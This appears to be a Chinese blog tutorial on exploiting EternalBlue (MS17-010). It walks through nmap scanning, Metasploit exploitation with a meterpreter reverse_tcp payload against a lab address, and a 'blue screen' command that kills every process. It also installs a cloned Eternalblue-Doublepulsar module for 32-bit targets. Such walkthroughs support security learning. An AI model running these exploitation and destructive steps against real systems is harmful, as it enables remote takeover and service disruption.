永恒之蓝 ms17-010

文章目录

  • [永恒之蓝 ms17-010](#永恒之蓝 ms17-010)
    • [1. 漏洞介绍](#1. 漏洞介绍)
      • [1.1 影响版本](#1.1 影响版本)
      • [1.2 漏洞原理](#1.2 漏洞原理)
    • [2. 信息收集](#2. 信息收集)
      • [2.1 主机扫描](#2.1 主机扫描)
      • [2.2 端口扫描](#2.2 端口扫描)
    • [3. 漏洞探测](#3. 漏洞探测)
    • [4. 漏洞利用](#4. 漏洞利用)
    • [5. 特殊情况](#5. 特殊情况)
      • [5.1 安装wine32环境](#5.1 安装wine32环境)
      • [5.2 安装攻击32位操作系统所用的的脚本](#5.2 安装攻击32位操作系统所用的的脚本)

永恒之蓝 ms17-010

很久之前做过的永恒之蓝漏洞...

1. 漏洞介绍

永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造"永恒之蓝"制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

1.1 影响版本

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

1.2 漏洞原理

通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。

2. 信息收集

2.1 主机扫描

sh 复制代码
arp-scan -l

2.2 端口扫描

sh 复制代码
nmap -O -sS -T4 192.168.188.222

3. 漏洞探测

sh 复制代码
msfconsole
# 搜寻模块
search ms17-010
sh 复制代码
# 使用第三个模块
use 3
# 查看该漏洞模块的具体介绍信息
info

使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。

sh 复制代码
show options

RHOSTS选项为空,需要填写,RHOSTS代表要攻击的目标。输入r然后按tab键可以自动补全该参数。

sh 复制代码
set rhosts 192.168.188.222

显示该主机很可能能够会受到永恒之蓝漏洞的攻击。

sh 复制代码
run

4. 漏洞利用

sh 复制代码
search 17-010

设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell。

sh 复制代码
set payload windows/x64/meterpreter/reverse_tcp

设置攻击目标

sh 复制代码
set rhosts 192.168.188.222
run

拿下该主机的shell,执行cmd命令。

sh 复制代码
getuid
sh 复制代码
ipconfig

蓝屏攻击

sh 复制代码
taskkill /f /fi "pid ne 1"

命令解析:

  • 用于在 Windows 操作系统中终止进程的命令。它的作用是强制结束所有除了系统进程(PID为1)之外的其他进程。

  • 在 Windows 操作系统中,进程标识符(PID)为 1 的进程通常是系统进程,也称为"System"进程或"System Idle Process"进程。这个进程是操作系统内核的一部分,负责管理和调度其他进程的运行。

5. 特殊情况

由于不知道目标操作系统是32位还是64位的,我们在使用ms17010攻击模块的时候常规使用64位来进行攻击。

如果在攻击的时候,出现攻击失败等提示信息,那么说明该模块只能攻击64位操作系统,也说明了目标靶机是32位的操作系统。

5.1 安装wine32环境

sh 复制代码
apt-get install wine32

在执行exploit时可能会出现 :

it looks like wine32 is missing, you should install it.

multiarch needs to be enabled first. as root, please

execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"

按照上面的方法dpkg --add-architecture i386 && apt-get update && apt-get install wine32即可

sh 复制代码
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

验证是否安装成功

sh 复制代码
wine --version

用wine32执行cmd.exe

sh 复制代码
wine cmd.exe

5.2 安装攻击32位操作系统所用的的脚本

首先下载利用的脚本:

sh 复制代码
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

sh 复制代码
cd Eternalblue-Doublepulsar-Metasploit/
 
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

接下来使用exploit模块(步骤同上,原理同上)

sh 复制代码
msfconsole
 
search eternalblue  #或者search ms17-010

如果在成功打过去了,但是一直频繁的刷shell的信息,就是回弹不出shell的终端,这个是为什么?

  • 防火墙或安全软件阻止了反向连接:目标系统上可能配置了防火墙或安全软件,阻止了从被攻击系统回连到攻击者控制的服务器的连接。这样一来,即使成功执行了恶意代码,也无法建立与攻击者服务器的连接,导致无法回弹 shell。
  • 网络配置问题:目标系统的网络配置可能存在问题,例如无法访问互联网、网络隔离等,导致无法回连到攻击者的服务器。
  • 安全补丁或安全措施:目标系统可能已经应用了相关的安全补丁或采取了其他安全措施,修复了永恒之蓝漏洞或阻止了其利用。这样一来,攻击者无法成功利用漏洞,也无法回弹 shell。
相关推荐
鹏大师运维15 分钟前
【功能介绍】信创终端系统上各WPS版本的授权差异
linux·wps·授权·麒麟·国产操作系统·1024程序员节·统信uos
亦枫Leonlew1 小时前
微积分复习笔记 Calculus Volume 1 - 4.7 Applied Optimization Problems
笔记·数学·微积分·1024程序员节
小肥象不是小飞象1 小时前
(六千字心得笔记)零基础C语言入门第八课——函数(上)
c语言·开发语言·笔记·1024程序员节
一个通信老学姐10 小时前
专业130+总400+武汉理工大学855信号与系统考研经验电子信息与通信工程,真题,大纲,参考书。
考研·信息与通信·信号处理·1024程序员节
力姆泰克11 小时前
看电动缸是如何提高农机的自动化水平
大数据·运维·服务器·数据库·人工智能·自动化·1024程序员节
力姆泰克11 小时前
力姆泰克电动缸助力农业机械装备,提高农机的自动化水平
大数据·服务器·数据库·人工智能·1024程序员节
程思扬11 小时前
为什么Uptime+Kuma本地部署与远程使用是网站监控新选择?
linux·服务器·网络·经验分享·后端·网络协议·1024程序员节
转世成为计算机大神12 小时前
网关 Spring Cloud Gateway
java·网络·spring boot·1024程序员节
paopaokaka_luck12 小时前
基于Spring Boot+Vue的助农销售平台(协同过滤算法、限流算法、支付宝沙盒支付、实时聊天、图形化分析)
java·spring boot·小程序·毕业设计·mybatis·1024程序员节
幼儿园园霸柒柒12 小时前
第七章: 7.3求一个3*3的整型矩阵对角线元素之和
c语言·c++·算法·矩阵·c#·1024程序员节